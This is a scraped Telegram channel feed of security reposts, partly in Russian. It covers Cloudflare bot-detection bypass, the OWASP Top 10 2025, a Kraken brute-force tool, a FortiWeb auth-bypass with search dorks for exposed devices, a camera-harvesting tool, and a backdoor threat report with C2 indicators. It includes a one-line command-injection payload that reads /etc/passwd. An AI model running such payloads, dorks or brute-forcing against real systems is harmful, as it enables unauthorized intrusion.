SecList for CyberStudents
Cloudflare has started blocking proxy tools like Burp Suite. If you encounter this error, download the “Bypass Bot Detection” extension from the BApp Store in Burp Suite. It should resolve the issue for Burp Suite. #Cloudflare #Pentest #BugBounty #from_X
GitHub
GitHub - PortSwigger/bypass-bot-detection: Burp Suite extension that mutates ciphers to bypass TLS-fingerprint based bot detection
Burp Suite extension that mutates ciphers to bypass TLS-fingerprint based bot detection - PortSwigger/bypass-bot-detection
OWASP TOP 10 2025.pdf
3.6 MB
OWASP Top 10 (2025)
- A01:2025 Broken Access Control
- A02:2025 Security Misconfiguration
- A03:2025 Software Supply Chain Failures
- A04:2025 Cryptographic Failures
- A05:2025 Injection
- A06:2025 Insecure Design
- A07:2025 Authentication Failures
- A08:2025 Software or Data Integrity Failures
- A09:2025 Logging & Alerting Failures
- A10:2025 Mishandling of Exceptional Conditions
👍2
Forwarded from Proxy Bar
Видишь на сайте выбор Language, не поленись !
Language={${system("cat+/etc/passwd")}}😁3🔥2
Forwarded from Codeby
Kraken
Kraken — мощный инструмент на основе Python, разработанный для централизации и оптимизации различных задач подбора паролей. Kraken предоставляет специалистам по кибербезопасности набор инструментов для эффективного проведения атак методом подбора паролей по различным протоколам и сервисам.
Kraken предлагает ряд инструментов для брутфорса:
1️⃣ Сетевые инструменты - FTP, Kubernetes, LDAP, SSH
2️⃣ Инструменты веб-приложений - CPanel, Drupal, Joomla
3️⃣ Инструменты поиска - Admin Panel Finder, Directory Finder, Subdomain Finder
💻 Установка:
📌 Использование:
Kraken — мощный инструмент на основе Python, разработанный для централизации и оптимизации различных задач подбора паролей. Kraken предоставляет специалистам по кибербезопасности набор инструментов для эффективного проведения атак методом подбора паролей по различным протоколам и сервисам.
Kraken предлагает ряд инструментов для брутфорса:
git clone https://github.com/jasonxtn/kraken.git
cd kraken
pip3 install -r requirements.txt
python3 kraken.py
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Suhayl.log
This media is not supported in your browser
VIEW IN TELEGRAM
Fortinet 0day
An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication.
Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/
Dork:
ZoomEye Dork: app="FortiWeb"
HUNTER: product.name="FortiWeb"
An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication.
Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/
Dork:
ZoomEye Dork: app="FortiWeb"
HUNTER: product.name="FortiWeb"
Forwarded from Cat Seclist
CVE-2025-33073
*
POC я уже публиковал, а тут универсалочка подъехала.
Universal exploit
#win #DC #controller
*
POC я уже публиковал, а тут универсалочка подъехала.
Universal exploit
#win #DC #controller
BloodCat
Инструмент для сбора информации о публично доступных сетевых камерах, с поддержкой фильтрации по стране и региону.
https://github.com/MartinxMax/BloodCat
Инструмент для сбора информации о публично доступных сетевых камерах, с поддержкой фильтрации по стране и региону.
https://github.com/MartinxMax/BloodCat
Forwarded from Android Security & Malware
Flutter SSL Bypass: How to Intercept HTTPS Traffic When all other Frida Scripts Fail
https://m4kr0x.medium.com/flutter-tls-bypass-how-to-intercept-https-traffic-when-all-other-frida-scripts-fail-bd3d04489088
https://m4kr0x.medium.com/flutter-tls-bypass-how-to-intercept-https-traffic-when-all-other-frida-scripts-fail-bd3d04489088
Medium
Flutter SSL Bypass: How to Intercept HTTPS Traffic When all other Frida Scripts Fail
In this article, I’ll walk you through my journey in intercepting HTTPS traffic from a APK based on Flutter during a pentesting engagement…
Forwarded from Threat Hunting Father 🦔
Исследователи из АО ГТС на PROFIT.KZ представили разбор вредоносной активности, в которой фигурируют два связанных инструмента — TrustFall и MystRodX.
Они отдельно отметили, что о схожем вредоносе ранее писали аналитики QAX (@RedDrip7), которые использовали название MystRodX для такого же типа атаки.
По данным ГТС, это звенья одной кампании, наблюдавшейся в 2025 году.
Лёгкий backdoor: выполняет команды через
/bin/sh, пакует данные (tar -czvf), удаляет следы (rm -rf) и отправляет информацию через POST на /news/data_form.php. Использует фиксированные C2 и позже — шифрование.Более новая стадия той же линии: обновлённый модуль с другим форматом сетевого обмена, зашифрованным трафиком и расширенной C2-инфраструктурой. Распространялся через
139.84.156.79.185.154.154.135
213.159.64.6
2.56.177.181
37.221.125.201
5.252.22.232
45.14.244.110
45.83.140.218
154.196.162.76
Сервер распространения139.84.156.79
Конфигурационные файлыtcbipkrn.config → 185.154.154.135
baeeajzb.config → 213.159.64.6
URI/news/data_form.php
Поведенческие признакиtar -czvf
rm -rf
/bin/sh -c "<command>"
шифрование трафика (в поздней активности)
смена канала управления
STA-2201
Группа, впервые замеченная в 2019, работает по двум направлениям:
• Initial Access Broker (первичный доступ)
• Классическая APT-активность: кража и эксфильтрация данных
Позже стала действовать более скрытно.
Сектора: госуправление, телеком.
STA-2404
Продвинутая хакерская группа, образованная после структурных изменений (детали скрыты).
Активность отслеживается с 2024 года (две волны).
Сектора: госуправление, энергетика, здравоохранение, наука, транспорт, финансы.
• Презентация: https://profitday.kz/pdf/security2025/15.pdf
• sts.kz
• Запись выступления: https://www.youtube.com/live/8eueDGkMMlo?t=26395
•https://blog.xlab.qianxin.com/mystrodx_covert_dual-mode_backdoor_en/
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM